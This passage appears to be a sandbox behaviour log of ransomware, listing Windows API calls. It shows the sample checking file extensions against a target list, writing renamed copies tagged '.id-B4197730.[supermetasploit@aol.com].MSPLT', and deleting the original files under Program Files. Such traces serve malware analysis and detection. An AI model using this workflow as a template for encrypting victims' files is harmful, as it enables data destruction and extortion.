(lpString=".doc") returned 4 [0296.842] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.842] lstrlenW (lpString=".docx") returned 5 [0296.842] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0296.842] lstrlenW (lpString=".pdf") returned 4 [0296.842] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.842] lstrlenW (lpString=".xls") returned 4 [0296.842] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.842] lstrlenW (lpString=".xlsx") returned 5 [0296.842] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0296.842] lstrlenW (lpString=".ppt") returned 4 [0296.843] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0296.843] lstrlenW (lpString=".zip") returned 4 [0296.843] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.843] lstrlenW (lpString=".rar") returned 4 [0296.843] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.843] lstrlenW (lpString=".bz2") returned 4 [0296.843] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.843] lstrlenW (lpString=".7z") returned 3 [0296.843] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0296.843] lstrlenW (lpString=".dbf") returned 4 [0296.843] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.859] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0296.859] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0296.860] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0296.860] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0296.864] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0296.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0297.001] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0297.011] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0297.014] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0297.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0298.026] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.028] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.028] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0298.033] GetLastError () returned 0x0 [0298.033] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x27a, lpOverlapped=0x0) returned 1 [0298.036] WriteFile (in: hFile=0x42c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x280, lpOverlapped=0x0) returned 1 [0298.038] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.038] WriteFile (in: hFile=0x42c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xe2, lpOverlapped=0x0) returned 1 [0298.038] SetEndOfFile (hFile=0x42c) returned 1 [0298.038] CloseHandle (hObject=0x42c) returned 1 [0298.043] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.043] SetEndOfFile (hFile=0x440) returned 1 [0298.054] CloseHandle (hObject=0x440) returned 1 [0298.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.062] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg")) returned 1 [0298.063] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.063] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.063] lstrlenW (lpString=".doc") returned 4 [0298.063] lstrcmpiW (lpString1=".doc", lpString2=".cfg") returned 1 [0298.063] lstrlenW (lpString=".docx") returned 5 [0298.063] lstrcmpiW (lpString1=".docx", lpString2="m.cfg") returned -1 [0298.063] lstrlenW (lpString=".pdf") returned 4 [0298.063] lstrcmpiW (lpString1=".pdf", lpString2=".cfg") returned 1 [0298.063] lstrlenW (lpString=".xls") returned 4 [0298.063] lstrcmpiW (lpString1=".xls", lpString2=".cfg") returned 1 [0298.063] lstrlenW (lpString=".xlsx") returned 5 [0298.063] lstrcmpiW (lpString1=".xlsx", lpString2="m.cfg") returned -1 [0298.063] lstrlenW (lpString=".ppt") returned 4 [0298.063] lstrcmpiW (lpString1=".ppt", lpString2=".cfg") returned 1 [0298.063] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.063] lstrlenW (lpString=".zip") returned 4 [0298.063] lstrcmpiW (lpString1=".zip", lpString2=".cfg") returned 1 [0298.063] lstrlenW (lpString=".rar") returned 4 [0298.063] lstrcmpiW (lpString1=".rar", lpString2=".cfg") returned 1 [0298.063] lstrlenW (lpString=".bz2") returned 4 [0298.063] lstrcmpiW (lpString1=".bz2", lpString2=".cfg") returned -1 [0298.063] lstrlenW (lpString=".7z") returned 3 [0298.063] lstrcmpiW (lpString1=".7z", lpString2="cfg") returned -1 [0298.063] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.063] lstrlenW (lpString=".dbf") returned 4 [0298.064] lstrcmpiW (lpString1=".dbf", lpString2=".cfg") returned 1 [0298.064] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.064] lstrlenW (lpString=".1cd") returned 4 [0298.064] lstrcmpiW (lpString1=".1cd", lpString2=".cfg") returned -1 [0298.064] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.064] lstrlenW (lpString=".jpg") returned 4 [0298.064] lstrcmpiW (lpString1=".jpg", lpString2=".cfg") returned 1 [0298.064] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.064] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.064] lstrlenW (lpString=".doc") returned 4 [0298.064] lstrcmpiW (lpString1=".doc", lpString2=".cfg") returned 1 [0298.064] lstrlenW (lpString=".docx") returned 5 [0298.064] lstrcmpiW (lpString1=".docx", lpString2="m.cfg") returned -1 [0298.064] lstrlenW (lpString=".pdf") returned 4 [0298.064] lstrcmpiW (lpString1=".pdf", lpString2=".cfg") returned 1 [0298.064] lstrlenW (lpString=".xls") returned 4 [0298.064] lstrcmpiW (lpString1=".xls", lpString2=".cfg") returned 1 [0298.064] lstrlenW (lpString=".xlsx") returned 5 [0298.064] lstrcmpiW (lpString1=".xlsx", lpString2="m.cfg") returned -1 [0298.064] lstrlenW (lpString=".ppt") returned 4 [0298.064] lstrcmpiW (lpString1=".ppt", lpString2=".cfg") returned 1 [0298.064] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.064] lstrlenW (lpString=".zip") returned 4 [0298.064] lstrcmpiW (lpString1=".zip", lpString2=".cfg") returned 1 [0298.064] lstrlenW (lpString=".rar") returned 4 [0298.064] lstrcmpiW (lpString1=".rar", lpString2=".cfg") returned 1 [0298.064] lstrlenW (lpString=".bz2") returned 4 [0298.064] lstrcmpiW (lpString1=".bz2", lpString2=".cfg") returned -1 [0298.064] lstrlenW (lpString=".7z") returned 3 [0298.064] lstrcmpiW (lpString1=".7z", lpString2="cfg") returned -1 [0298.065] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.065] lstrlenW (lpString=".dbf") returned 4 [0298.065] lstrcmpiW (lpString1=".dbf", lpString2=".cfg") returned 1 [0298.065] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.065] lstrlenW (lpString=".1cd") returned 4 [0298.065] lstrcmpiW (lpString1=".1cd", lpString2=".cfg") returned -1 [0298.065] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0298.065] lstrlenW (lpString=".jpg") returned 4 [0298.065] lstrcmpiW (lpString1=".jpg", lpString2=".cfg") returned 1 [0298.065] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0298.065] lstrlenW (lpString="calendars.properties") returned 20 [0298.065] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.066] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=1378) returned 1 [0298.066] CloseHandle (hObject=0x440) returned 1 [0298.066] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties")) returned 0x20 [0298.066] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.066] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.067] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.067] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.067] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0298.070] GetLastError () returned 0x0 [0298.070] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x562, lpOverlapped=0x0) returned 1 [0298.088] WriteFile (in: hFile=0x4c8, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x570, lpOverlapped=0x0) returned 1 [0298.089] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.089] WriteFile (in: hFile=0x4c8, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xfc, lpOverlapped=0x0) returned 1 [0298.090] SetEndOfFile (hFile=0x4c8) returned 1 [0298.090] CloseHandle (hObject=0x4c8) returned 1 [0298.096] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.096] SetEndOfFile (hFile=0x440) returned 1 [0298.489] CloseHandle (hObject=0x440) returned 1 [0298.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.490] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties")) returned 1 [0298.491] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.491] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.491] lstrlenW (lpString=".doc") returned 4 [0298.491] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0298.491] lstrlenW (lpString=".docx") returned 5 [0298.491] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0298.491] lstrlenW (lpString=".pdf") returned 4 [0298.491] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0298.491] lstrlenW (lpString=".xls") returned 4 [0298.491] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0298.491] lstrlenW (lpString=".xlsx") returned 5 [0298.491] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0298.491] lstrlenW (lpString=".ppt") returned 4 [0298.491] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0298.491] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.491] lstrlenW (lpString=".zip") returned 4 [0298.491] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0298.491] lstrlenW (lpString=".rar") returned 4 [0298.491] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0298.491] lstrlenW (lpString=".bz2") returned 4 [0298.491] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0298.491] lstrlenW (lpString=".7z") returned 3 [0298.491] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0298.491] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.491] lstrlenW (lpString=".dbf") returned 4 [0298.491] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.492] lstrlenW (lpString=".1cd") returned 4 [0298.492] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.492] lstrlenW (lpString=".jpg") returned 4 [0298.492] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.492] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.492] lstrlenW (lpString=".doc") returned 4 [0298.492] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString=".docx") returned 5 [0298.492] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0298.492] lstrlenW (lpString=".pdf") returned 4 [0298.492] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString=".xls") returned 4 [0298.492] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString=".xlsx") returned 5 [0298.492] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0298.492] lstrlenW (lpString=".ppt") returned 4 [0298.492] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.492] lstrlenW (lpString=".zip") returned 4 [0298.492] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString=".rar") returned 4 [0298.492] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0298.492] lstrlenW (lpString=".bz2") returned 4 [0298.493] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0298.493] lstrlenW (lpString=".7z") returned 3 [0298.493] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0298.493] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.493] lstrlenW (lpString=".dbf") returned 4 [0298.493] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0298.493] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.493] lstrlenW (lpString=".1cd") returned 4 [0298.493] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0298.493] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0298.493] lstrlenW (lpString=".jpg") returned 4 [0298.493] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0298.493] lstrcmpiW (lpString1=".pf", lpString2=".MSPLT") returned 1 [0298.493] lstrlenW (lpString="LINEAR_RGB.pf") returned 13 [0298.493] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.494] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=1044) returned 1 [0298.495] CloseHandle (hObject=0x440) returned 1 [0298.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf")) returned 0x20 [0298.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.495] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0298.495] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.495] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.495] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0298.497] GetLastError () returned 0x0 [0298.497] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x414, lpOverlapped=0x0) returned 1 [0298.501] WriteFile (in: hFile=0x4c0, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x420, lpOverlapped=0x0) returned 1 [0298.502] ReadFile (in: hFile=0x440, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.502] WriteFile (in: hFile=0x4c0, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xee, lpOverlapped=0x0) returned 1 [0298.502] SetEndOfFile (hFile=0x4c0) returned 1 [0298.502] CloseHandle (hObject=0x4c0) returned 1 [0298.504] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.504] SetEndOfFile (hFile=0x440) returned 1 [0298.613] CloseHandle (hObject=0x440) returned 1 [0298.613] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.614] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf")) returned 1 [0298.615] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.615] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.615] lstrlenW (lpString=".doc") returned 4 [0298.615] lstrcmpiW (lpString1=".doc", lpString2="B.pf") returned -1 [0298.615] lstrlenW (lpString=".docx") returned 5 [0298.615] lstrcmpiW (lpString1=".docx", lpString2="GB.pf") returned -1 [0298.615] lstrlenW (lpString=".pdf") returned 4 [0298.615] lstrcmpiW (lpString1=".pdf", lpString2="B.pf") returned -1 [0298.615] lstrlenW (lpString=".xls") returned 4 [0298.615] lstrcmpiW (lpString1=".xls", lpString2="B.pf") returned -1 [0298.615] lstrlenW (lpString=".xlsx") returned 5 [0298.615] lstrcmpiW (lpString1=".xlsx", lpString2="GB.pf") returned -1 [0298.615] lstrlenW (lpString=".ppt") returned 4 [0298.615] lstrcmpiW (lpString1=".ppt", lpString2="B.pf") returned -1 [0298.615] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 56 [0298.615] lstrlenW (lpString=".zip") returned 4 [0298.615] lstrcmpiW (lpString1=".zip", lpString2="B.pf") returned -1 [0298.615] lstrlenW (lpString=".rar") 